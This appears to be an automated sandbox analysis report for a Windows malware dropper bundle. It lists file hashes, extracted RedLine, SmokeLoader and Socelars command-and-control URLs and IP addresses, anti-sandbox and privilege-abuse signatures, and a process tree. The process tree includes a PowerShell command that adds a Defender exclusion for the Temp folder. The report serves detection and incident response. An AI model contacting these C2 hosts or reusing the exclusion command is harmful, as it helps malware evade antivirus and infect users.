Overview
overview
10Static
static
022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows11_x64
10022e3c30a1...66.exe
windows10_x64
104d27dca0a1...ef.exe
windows7_x64
104d27dca0a1...ef.exe
windows11_x64
104d27dca0a1...ef.exe
windows10_x64
10578a3a7a2b...b3.exe
windows7_x64
10578a3a7a2b...b3.exe
windows11_x64
10578a3a7a2b...b3.exe
windows10_x64
109c4880a98c...82.exe
windows7_x64
109c4880a98c...82.exe
windows11_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows7_x64
10a1dad4a83d...c4.exe
windows11_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows7_x64
10acf1b7d80f...e0.exe
windows11_x64
10acf1b7d80f...e0.exe
windows10_x64
10cbf31d825a...d2.exe
windows7_x64
10cbf31d825a...d2.exe
windows11_x64
10cbf31d825a...d2.exe
windows10_x64
10db76a117db...12.exe
windows7_x64
10db76a117db...12.exe
windows11_x64
10db76a117db...12.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows7_x64
10e2ffb8aeeb...f6.exe
windows11_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10f2196668f4...cb.exe
windows7_x64
10f2196668f4...cb.exe
windows11_x64
10f2196668f4...cb.exe
windows10_x64
10Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
56s -
max time network
165s -
platform
windows11_x64 -
resource
win11 -
submitted
10/11/2021, 14:50
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win11
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
Behavioral task
behavioral4
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-en-20211104
Behavioral task
behavioral5
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win11
Behavioral task
behavioral6
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-en-20211014
Behavioral task
behavioral8
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win11
Behavioral task
behavioral9
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211104
Behavioral task
behavioral10
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-en-20211014
Behavioral task
behavioral11
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win11
Behavioral task
behavioral12
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win11
Behavioral task
behavioral15
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral16
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-en-20211104
Behavioral task
behavioral17
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win11
Behavioral task
behavioral18
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral19
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win11
Behavioral task
behavioral21
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211014
Behavioral task
behavioral22
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win7-en-20211104
Behavioral task
behavioral23
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win11
Behavioral task
behavioral24
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-en-20211104
Behavioral task
behavioral25
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win7-en-20211014
Behavioral task
behavioral26
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win11
Behavioral task
behavioral27
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-en-20211104
Behavioral task
behavioral28
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win7-en-20211014
Behavioral task
behavioral29
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win11
Behavioral task
behavioral30
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-en-20211104
General
-
Target
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
-
Size
4.6MB
-
MD5
c7f1d6db5efddf8b46441be0edfaadfd
-
SHA1
e27a2fab7ac49b1709c8d9e0183b020f1be61fc6
-
SHA256
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12
-
SHA512
856e4f8a48848b5ddc42af7c282fdbc87df641665c0a0fdb28d5af2b6ac3299d9ae3c9b9d25b145816092abd248df32c9ea4f72ea59217b50460d48fb95ecb9a
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
fucker2
135.181.129.119:4805
Extracted
redline
media18
91.121.67.60:2151
Extracted
smokeloader
2020
http://nalirou70.top/
http://xacokuo80.top/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3324 4936 rundll32.exe 26 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7068 4936 rundll32.exe 26 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral23/memory/5052-296-0x0000000000000000-mapping.dmp family_redline behavioral23/memory/5052-297-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2400-328-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2400-325-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral23/files/0x000100000002b1d1-211.dat family_socelars behavioral23/files/0x000100000002b1d1-234.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
description pid Process procid_target PID 2472 created 3392 2472 WerFault.exe 82 PID 5160 created 5124 5160 WerFault.exe 254 PID 5208 created 3192 5208 HaFItDQfZWeGlrCdh4kFMt_6.exe 115 PID 2188 created 1304 2188 WerFault.exe 113 PID 2036 created 3036 2036 WerFault.exe 112 -
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral23/memory/3076-494-0x0000000000790000-0x00000000007B1000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral23/memory/5640-438-0x0000000002260000-0x0000000002335000-memory.dmp family_vidar -
resource yara_rule behavioral23/files/0x000300000002a22b-156.dat aspack_v212_v242 behavioral23/files/0x000300000002a22b-154.dat aspack_v212_v242 behavioral23/files/0x000300000002b030-153.dat aspack_v212_v242 behavioral23/files/0x000100000002b1c7-161.dat aspack_v212_v242 behavioral23/files/0x000100000002b1c7-160.dat aspack_v212_v242 behavioral23/files/0x000300000002b030-159.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 38 IoCs
pid Process 2424 setup_installer.exe 3392 setup_install.exe 2044 Tue1607c6ec89.exe 4452 Tue160598ce8b05.exe 3204 Tue16497809b6bd.exe 3192 Tue169b8ca3fff9b96f8.exe 1304 Tue16752f37c10e89.exe 3904 Tue1693c6e21a84f1.exe 2988 Tue161bd708d12e5.exe 4064 Tue16937a015b8e.exe 884 Tue165ec2d1de4f1ae98.exe 2752 Tue1695d07d02bff8ff.exe 3036 Tue162f02d7b75a1d.exe 1172 Tue166a21bf15ecf0.exe 2284 Tue1604aa7d34a61a5b.exe 4988 Tue1647cedf7bf133.exe 2400 Tue1693c6e21a84f1.exe 1308 Tue16937a015b8e.exe 932 Tue16937a015b8e.tmp 2556 mshta.exe 5052 Tue1607c6ec89.exe 2012 bg_ugflVLgnyjdYexFwscoBP.exe 2536 fkKCS.exe 2428 e_irO0_3R6Rf9GgjVi0_oXWl.exe 2400 Tue1693c6e21a84f1.exe 5600 MgizT9j68bTrUhE8vbFwjxRi.exe 5620 hBYVkgzfvd8h0hZgEHfZ6oEa.exe 5632 rZ7ocUkNDU0jxOPMfMVuMaW7.exe 5648 QwOBJYTdYE3XjXInE_VvxlBs.exe 5656 uafVdwKyHT5gPne18wT5RnX4.exe 5672 XKpP1q8iPJVAjqogv7ILKaft.exe 5640 3GsuTLMCUrLvXLXPiblSrtkE.exe 5692 RJwzwL5KMuWQjArNCsoUoy9D.exe 5720 3eluNx1mt7j4BZpZ1U0qpptt.exe 5784 awhaFF5dYihHOJjYYvSy1f4Y.exe 5776 8KowEmYAHlW3pmz2nDd7ZaO1.exe 5808 07yTnXbxqaDTuklt6GljNxGL.exe 5912 ezLMa4B4NXobtlOIKECpsSEn.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8KowEmYAHlW3pmz2nDd7ZaO1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8KowEmYAHlW3pmz2nDd7ZaO1.exe -
Loads dropped DLL 8 IoCs
pid Process 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 2400 Tue1693c6e21a84f1.exe 932 Tue16937a015b8e.tmp 5124 taskkill.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8KowEmYAHlW3pmz2nDd7ZaO1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RJwzwL5KMuWQjArNCsoUoy9D.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 152 ipinfo.io 204 ipinfo.io 238 ipinfo.io 8 ipinfo.io 65 ipinfo.io 67 ip-api.com 69 ipinfo.io 90 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 5692 RJwzwL5KMuWQjArNCsoUoy9D.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2044 set thread context of 5052 2044 Tue1607c6ec89.exe 123 PID 3904 set thread context of 2400 3904 Tue1693c6e21a84f1.exe 127 -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe uafVdwKyHT5gPne18wT5RnX4.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe uafVdwKyHT5gPne18wT5RnX4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
pid pid_target Process procid_target 2852 3392 WerFault.exe 82 5180 5124 WerFault.exe 136 5232 3192 WerFault.exe 115 1264 1304 WerFault.exe 113 5260 3036 WerFault.exe 112 6092 5600 WerFault.exe 141 2608 5648 WerFault.exe 146 2008 5220 WerFault.exe 161 6052 5208 WerFault.exe 160 4652 3076 WerFault.exe 183 1276 884 WerFault.exe 100 976 5720 WerFault.exe 142 5652 4968 WerFault.exe 184 3076 1720 WerFault.exe 162 7008 4488 WerFault.exe 257 7056 4032 WerFault.exe 258 7128 1904 WerFault.exe 261 5956 6268 WerFault.exe 309 2200 6664 WerFault.exe 312 -
Checks processor information in registry 2 TTPs 21 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4488 schtasks.exe 5276 schtasks.exe 5244 schtasks.exe 5984 schtasks.exe 3308 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 4 IoCs
pid Process 2976 taskkill.exe 1588 taskkill.exe 5124 taskkill.exe 7020 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2940 powershell.exe 2940 powershell.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 2852 WerFault.exe 2852 WerFault.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe 3204 Tue16497809b6bd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeAssignPrimaryTokenPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeLockMemoryPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeIncreaseQuotaPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeMachineAccountPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeTcbPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeSecurityPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeTakeOwnershipPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeLoadDriverPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeSystemProfilePrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeSystemtimePrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeProfSingleProcessPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeIncBasePriorityPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeCreatePagefilePrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeCreatePermanentPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeBackupPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeRestorePrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeShutdownPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeDebugPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeAuditPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeSystemEnvironmentPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeChangeNotifyPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeRemoteShutdownPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeUndockPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeSyncAgentPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeEnableDelegationPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeManageVolumePrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeImpersonatePrivilege 884 Tue165ec2d1de4f1ae98.exe Token: SeCreateGlobalPrivilege 884 Tue165ec2d1de4f1ae98.exe Token: 31 884 Tue165ec2d1de4f1ae98.exe Token: 32 884 Tue165ec2d1de4f1ae98.exe Token: 33 884 Tue165ec2d1de4f1ae98.exe Token: 34 884 Tue165ec2d1de4f1ae98.exe Token: 35 884 Tue165ec2d1de4f1ae98.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 4988 Tue1647cedf7bf133.exe Token: SeDebugPrivilege 4452 Tue160598ce8b05.exe Token: SeRestorePrivilege 2852 WerFault.exe Token: SeBackupPrivilege 2852 WerFault.exe Token: SeDebugPrivilege 2976 taskkill.exe Token: SeCreateTokenPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeAssignPrimaryTokenPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeLockMemoryPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeIncreaseQuotaPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeMachineAccountPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeTcbPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeSecurityPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeTakeOwnershipPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeLoadDriverPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeSystemProfilePrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeSystemtimePrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeProfSingleProcessPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeIncBasePriorityPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeCreatePagefilePrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeCreatePermanentPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeBackupPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeRestorePrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeShutdownPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeDebugPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeAuditPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeSystemEnvironmentPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeChangeNotifyPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeRemoteShutdownPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe Token: SeUndockPrivilege 5672 XKpP1q8iPJVAjqogv7ILKaft.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3156 wrote to memory of 2424 3156 db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe 81 PID 3156 wrote to memory of 2424 3156 db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe 81 PID 3156 wrote to memory of 2424 3156 db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe 81 PID 2424 wrote to memory of 3392 2424 setup_installer.exe 82 PID 2424 wrote to memory of 3392 2424 setup_installer.exe 82 PID 2424 wrote to memory of 3392 2424 setup_installer.exe 82 PID 3392 wrote to memory of 1540 3392 setup_install.exe 86 PID 3392 wrote to memory of 1540 3392 setup_install.exe 86 PID 3392 wrote to memory of 1540 3392 setup_install.exe 86 PID 1540 wrote to memory of 2940 1540 cmd.exe 87 PID 1540 wrote to memory of 2940 1540 cmd.exe 87 PID 1540 wrote to memory of 2940 1540 cmd.exe 87 PID 3392 wrote to memory of 3108 3392 setup_install.exe 88 PID 3392 wrote to memory of 3108 3392 setup_install.exe 88 PID 3392 wrote to memory of 3108 3392 setup_install.exe 88 PID 3392 wrote to memory of 2720 3392 setup_install.exe 121 PID 3392 wrote to memory of 2720 3392 setup_install.exe 121 PID 3392 wrote to memory of 2720 3392 setup_install.exe 121 PID 3392 wrote to memory of 1492 3392 setup_install.exe 120 PID 3392 wrote to memory of 1492 3392 setup_install.exe 120 PID 3392 wrote to memory of 1492 3392 setup_install.exe 120 PID 3108 wrote to memory of 2044 3108 cmd.exe 89 PID 3108 wrote to memory of 2044 3108 cmd.exe 89 PID 3108 wrote to memory of 2044 3108 cmd.exe 89 PID 3392 wrote to memory of 2168 3392 setup_install.exe 119 PID 3392 wrote to memory of 2168 3392 setup_install.exe 119 PID 3392 wrote to memory of 2168 3392 setup_install.exe 119 PID 3392 wrote to memory of 2236 3392 setup_install.exe 90 PID 3392 wrote to memory of 2236 3392 setup_install.exe 90 PID 3392 wrote to memory of 2236 3392 setup_install.exe 90 PID 3392 wrote to memory of 2508 3392 setup_install.exe 91 PID 3392 wrote to memory of 2508 3392 setup_install.exe 91 PID 3392 wrote to memory of 2508 3392 setup_install.exe 91 PID 3392 wrote to memory of 4484 3392 setup_install.exe 92 PID 3392 wrote to memory of 4484 3392 setup_install.exe 92 PID 3392 wrote to memory of 4484 3392 setup_install.exe 92 PID 3392 wrote to memory of 2704 3392 setup_install.exe 118 PID 3392 wrote to memory of 2704 3392 setup_install.exe 118 PID 3392 wrote to memory of 2704 3392 setup_install.exe 118 PID 3392 wrote to memory of 2804 3392 setup_install.exe 93 PID 3392 wrote to memory of 2804 3392 setup_install.exe 93 PID 3392 wrote to memory of 2804 3392 setup_install.exe 93 PID 2720 wrote to memory of 4452 2720 cmd.exe 117 PID 2720 wrote to memory of 4452 2720 cmd.exe 117 PID 2720 wrote to memory of 4452 2720 cmd.exe 117 PID 3392 wrote to memory of 3188 3392 setup_install.exe 116 PID 3392 wrote to memory of 3188 3392 setup_install.exe 116 PID 3392 wrote to memory of 3188 3392 setup_install.exe 116 PID 1492 wrote to memory of 3204 1492 cmd.exe 94 PID 1492 wrote to memory of 3204 1492 cmd.exe 94 PID 1492 wrote to memory of 3204 1492 cmd.exe 94 PID 3392 wrote to memory of 3716 3392 setup_install.exe 95 PID 3392 wrote to memory of 3716 3392 setup_install.exe 95 PID 3392 wrote to memory of 3716 3392 setup_install.exe 95 PID 3392 wrote to memory of 4360 3392 setup_install.exe 96 PID 3392 wrote to memory of 4360 3392 setup_install.exe 96 PID 3392 wrote to memory of 4360 3392 setup_install.exe 96 PID 3392 wrote to memory of 4960 3392 setup_install.exe 98 PID 3392 wrote to memory of 4960 3392 setup_install.exe 98 PID 3392 wrote to memory of 4960 3392 setup_install.exe 98 PID 3392 wrote to memory of 4388 3392 setup_install.exe 97 PID 3392 wrote to memory of 4388 3392 setup_install.exe 97 PID 3392 wrote to memory of 4388 3392 setup_install.exe 97 PID 2804 wrote to memory of 3192 2804 cmd.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe"C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS879905C3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
